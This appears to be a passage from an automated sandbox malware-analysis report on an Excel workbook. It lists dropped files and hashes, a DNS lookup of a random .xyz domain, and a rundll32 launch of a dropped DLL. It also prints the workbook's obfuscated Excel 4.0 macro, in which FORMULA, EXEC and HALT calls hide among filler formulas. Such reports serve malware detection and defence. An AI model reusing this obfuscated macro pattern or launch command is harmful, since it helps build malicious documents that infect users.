              Preview: L..................F...........7G....)..G....)..G... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R.J..Desktop.d......QK.X.R.J*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\536720\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......536720..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\IovwfUybUJ.LNK
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:18 2020, mtime=Wed May 12 08:23:42 2021, atime=Wed May 12 08:23:42 2021, length=82897, window=hide
              Category:dropped
              Size (bytes):2038
              Entropy (8bit):4.57278260124542
              Encrypted:false
              SSDEEP:48:8ik/XT0ZVXbQON3SNQh2ik/XT0ZVXbQON3SNQ/:8ik/XuVXbINQh2ik/XuVXbINQ/
              MD5:D6B23A17B47E07D3F9ECB5189F9D2D52
              SHA1:B02CB3E10FCCFFD0E54ACF3090A40B7ECDEB0E1F
              SHA-256:A194726FA7E6FF4655F7328639903254B591A06E88CCA66E5A84736BBFB0D7D7
              SHA-512:D321EA5B3109B429DE36E548F43CAE5EDA78045696B24F503AC187A59E136CD1E0F01B58A9C7E17D3B3864AA3973F490BB5476C06B6973A3286C9F23BAD2A531
              Malicious:false
              Reputation:low
              Preview: L..................F.... ...-.*..{....)..G..d.5..G...C...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....h.2.iH...R.J .IOVWFU~1.XLS..L.......Q.y.Q.y*...8.....................I.o.v.w.f.U.y.b.U.J...x.l.s.x.......y...............-...8...[............?J......C:\Users\..#...................\\536720\Users.user\Desktop\IovwfUybUJ.xlsx.&.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.I.o.v.w.f.U.y.b.U.J...x.l.s.x.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......536720..........D_....3N...W...9F.C...........[D_....3N...W...9F
              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):85
              Entropy (8bit):4.637997700487247
              Encrypted:false
              SSDEEP:3:oyBVomxWnIS9f0KqfmxWnIS9fv:djUvcvp
              MD5:EC8BFA504F021734837C28B3B42BC4CE
              SHA1:43DAEB03D0DDF96039E252698C7FCBEBA45169E4
              SHA-256:446520601B8F5F2509DB01D6FEC178A23E9CDB1AA9B5F33D3D9CC73F19C41245
              SHA-512:EFA62C469370FC45D4EFC1A5013CF1AE4E32D8AA6A70B161042B86548D0F27CA8230F6A27BD7EB131AD7835D5ADDFED2016D044F7F0F7A0C5442F01071153384
              Malicious:false
              Reputation:low
              Preview: Desktop.LNK=0..[misc]..IovwfUybUJ.LNK=0..IovwfUybUJ.LNK=0..[misc]..IovwfUybUJ.LNK=0..
              C:\Users\user\Desktop\FFDE0000
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:data
              Category:dropped
              Size (bytes):82897
              Entropy (8bit):7.896362058614588
              Encrypted:false
              SSDEEP:1536:iHXK4Ys4xTYNlME78wVvV2fVWpIxTFLVSSu8KW5W7YQ9j:i3K4YBkmI2dWpsFLg18KuwYQJ
              MD5:7898148263817928F2B05480C1794ABD
              SHA1:664A3D1F6E4D35F3A4166C4E54C42B9AC4EC250E
              SHA-256:332495AE67C3B5E37A9BBF329950970BE34483FA70CF4D2BE62E122DBDD3C067
              SHA-512:5F8140D2B50F411A9437CFE473DFEFB3BFC9CD6EEFC9F1AF4FB870F9878708B4179F3931B19EE681CE2BF5488B70B25BC622CF896D306A42DF862E0E1716E4E2
              Malicious:false
              Preview: .U.N.0..#....(qY.PS.,G@.|..O...my....8m..J..J....[.%....:.B@.l...H..N.[..c....IY.jg!..@q?8=....0a..\TD.NJ,*h.f...."~........E.w#.g.,..9...c.YS.4...."yX..R.P..P.F...........3.......:...bx.".....m..i..9.oG..q..as.C......3......{.+.+..`4$o*.j8-9.....I..d.0.P.F....C.=......H..%......<..WG....|.w-....hK..C"-j..W.$.R.T..N........C.5.......v..px..#.....n...z&.@.....&...Sa.....q:j.[.e;.._.......PK..........!..2..............[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0...H.C...n
              C:\Users\user\Desktop\~$IovwfUybUJ.xls
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:data
              Category:dropped
              Size (bytes):165
              Entropy (8bit):1.4377382811115937
              Encrypted:false
              SSDEEP:3:vZ/FFDJw2fV:vBFFGS
              MD5:797869BB881CFBCDAC2064F92B26E46F
              SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
              SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
              SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
              Malicious:false
              Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
              C:\Users\user\Desktop\~$IovwfUybUJ.xlsx
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:data
              Category:dropped
              Size (bytes):330
              Entropy (8bit):1.4377382811115937
              Encrypted:false
              SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
              MD5:96114D75E30EBD26B572C1FC83D1D02E
              SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
              SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
              SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
              Malicious:true
              Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

              Static File Info

              General

              File type:Microsoft Excel 2007+
              Entropy (8bit):7.8985100800919925
              TrID:
              • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
              • ZIP compressed archive (8000/1) 16.67%
              File name:IovwfUybUJ.xlsx
              File size:84073
              MD5:bcb5f8c6da6103a5bbd4891095f807af
              SHA1:fccc0e19a042d3da003bc4184b32c784ca5dfd14
              SHA256:9872498872843b5aae813d390df3e46ae02a4cc994ade723e4f5ba2973043fb7
              SHA512:6ab60fdcbc2f44b596fe66bd513e656d541d05f945f54d6e35616c31ab28fdfa587658fa69e68c6bd56842805f8ca21727b7a51fda6f594f9d2b198ecb8fbcd2
              SSDEEP:1536:yE7pyuK4Ys4xTYNlME78wVvVlf7u03IxTFLVSSu8KW5W7YQfH:ycK4YBkmIlXsFLg18KuwYQfH
              File Content Preview:PK..........!..g.C....e.......[Content_Types].xml ...(.........................................................................................................................................................................................................

              File Icon

              Icon Hash:e4e2aa8aa4b4bcb4

              Static OLE Info

              General

              Document Type:OpenXML
              Number of OLE Files:1

              OLE File "IovwfUybUJ.xlsx"

              Indicators

              Has Summary Info:
              Application Name:
              Encrypted Document:
              Contains Word Document Stream:
              Contains Workbook/Book Stream:
              Contains PowerPoint Document Stream:
              Contains Visio Document Stream:
              Contains ObjectPool Stream:
              Flash Objects Count:
              Contains VBA Macros:

              Macro 4.0 Code

              ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=SUMPRODUCT(54623,42,452,452,452)=RAND()=SUMPRODUCT(54623,42,452,452,452)=RAND()=SUMPRODUCT(54623,42,452,452,452)=RAND()=SUMPRODUCT(54623,42,452,452,452)='Doc1'!AJ5()",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=RAND()=SUMPRODUCT(54623,42,452,452,452)=RAND()=SUMPRODUCT(54623,42,452,452,452)=RAND()=SUMPRODUCT(54623,42,452,452,452)=RAND()=SUMPRODUCT(54623,42,452,452,452)=RAND()=SUMPRODUCT(54623,42,452,452,452)=FORMULA('Doc4'!$AT$3&'Doc4'!$AT$4&'Doc4'!$AT$5&'Doc4'!$AT$6&'Doc4'!$AT$7&'Doc4'!$AT$8,before.4.2.0.sheet!$AQ$13)=RAND()=SUMPRODUCT(54623,42,452,452,452)=RAND()=SUMPRODUCT(54623,42,452,452,452)=RAND()=SUMPRODUCT(54623,42,452,452,452)=RAND()=SUMPRODUCT(54623,42,452,452,452)=RAND()=SUMPRODUCT(54623,42,452,452,452)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=RAND()=SUMPRODUCT(54623,42,452,452,452)=RAND()=SUMPRODUCT(54623,42,452,452,452)=RAND()=SUMPRODUCT(54623,42,452,452,452)=RAND()=SUMPRODUCT(54623,42,452,452,452)=FORMULA('Doc4'!AU3&'Doc4'!AU4&'Doc4'!AU5&'Doc4'!AU6&'Doc4'!AU7&'Doc4'!AU8&'Doc4'!AU9&'Doc4'!AU10&'Doc4'!AU11&'Doc4'!AU12&'Doc4'!AU13&'Doc4'!AU14&'Doc4'!AU15&'Doc4'!AU16&'Doc4'!AU17&'Doc4'!AU18&'Doc4'!AU19&'Doc4'!AU20,before.4.2.0.sheet!AQ14)=RAND()=SUMPRODUCT(54623,42,452,452,452)=RAND()=SUMPRODUCT(54623,42,452,452,452)=RAND()=SUMPRODUCT(54623,42,452,452,452)=RAND()=SUMPRODUCT(54623,42,452,452,452)=RAND()=SUMPRODUCT(54623,42,452,452,452)=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
              =HALT()ttp://
              ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=AVERAGE(39393275,4328398,3735,23453897,52354327832)=SUM(93432,39473,4538937,32532,7324523)=AVERAGE(39393275,4328398,3735,23453897,52354327832)=SUM(93432,39473,4538937,32532,7324523)=AVERAGE(39393275,4328398,3735,23453897,52354327832)=SUM(93432,39473,4538937,32532,7324523)=AVERAGE(39393275,4328398,3735,23453897,52354327832)=SUM(93432,39473,4538937,32532,7324523)=AVERAGE(39393275,4328398,3735,23453897,52354327832)=SUM(93432,39473,4538937,32532,7324523)=AVERAGE(39393275,4328398,3735,23453897,52354327832)=SUM(93432,39473,4538937,32532,7324523)=AVERAGE(39393275,4328398,3735,23453897,52354327832)=SUM(93432,39473,4538937,32532,7324523)=AVERAGE(39393275,4328398,3735,23453897,52354327832)=SUM(93432,39473,4538937,32532,7324523)=AVERAGE(39393275,4328398,3735,23453897,52354327832)=SUM(93432,39473,4538937,32532,7324523)=AVERAGE(39393275,4328398,3735,23453897,52354327832)=SUM(93432,39473,4538937,32532,7324523)=EXEC('Doc3'!$AQ$18&""2 ""&before.2.1.0.sheet!$A$106&'Doc3'!$AQ$19)=AVERAGE(39393275,4328398,3735,23453897,52354327832)=SUM(93432,39473,4538937,32532,7324523)=AVERAGE(39393275,4328398,3735,23453897,52354327832)=SUM(93432,39473,4538937,32532,7324523)=AVERAGE(39393275,4328398,3735,23453897,52354327832)=SUM(93432,39473,4538937,32532,7324523)=AVERAGE(39393275,4328398,3735,23453897,52354327832)=SUM(93432,39473,4538937,32532,7324523)=AVERAGE(39393275,4328398,3735,23453897,52354327832)=SUM(93432,39473,4538937,32532,7324523)=AVERAGE(39393275,4328398,3735,23453897,52354327832)=SUM(93432,39473,4538937,32532,7324523)=AVERAGE(39393275,4328398,3735,23453897,52354327832)=SUM(93432,39473,4538937,32532,7324523)=AVERAGE(39393275,4328398,3735,23453897,52354327832)=SUM(93432,39473,4538937,32532,7324523)='Doc2'!A100()",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=AVERAGE(39393275,4328398,3735,23453897,52354327832)=SUM(93432,39473,4538937,32532,7324523)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

              Network Behavior

              Network Port Distribution

              UDP Packets

              TimestampSource PortDest PortSource IPDest IP
              May 12, 2021 02:23:53.896385908 CEST5219753192.168.2.228.8.8.8
              May 12, 2021 02:23:53.958700895 CEST53521978.8.8.8192.168.2.22

              DNS Queries

              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
              May 12, 2021 02:23:53.896385908 CEST192.168.2.228.8.8.80x312aStandard query (0)qvqy23thdsed03xjeqtf.xyzA (IP address)IN (0x0001)

              DNS Answers

              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
              May 12, 2021 02:23:53.958700895 CEST8.8.8.8192.168.2.220x312aName error (3)qvqy23thdsed03xjeqtf.xyznonenoneA (IP address)IN (0x0001)

              Code Manipulations

              Statistics

              CPU Usage

              Click to jump to process

              Memory Usage

              Click to jump to process

              High Level Behavior Distribution

              Click to dive into process behavior distribution

              Behavior

              Click to jump to process

              System Behavior

              General

              Start time:02:23:39
              Start date:12/05/2021
              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              Wow64 process (32bit):false
              Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
              Imagebase:0x13f020000
              File size:27641504 bytes
              MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Start time:02:23:43
              Start date:12/05/2021
              Path:C:\Windows\System32\rundll32.exe
              Wow64 process (32bit):false
              Commandline:rundll32 ..\iuhdvcl.ckd,DllRegisterServer
              Imagebase:0xffab0000
              File size:45568 bytes
              MD5 hash:DD81D91FF3B0763C392422865C9AC12E
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Disassembly

              Code Analysis

              Reset < >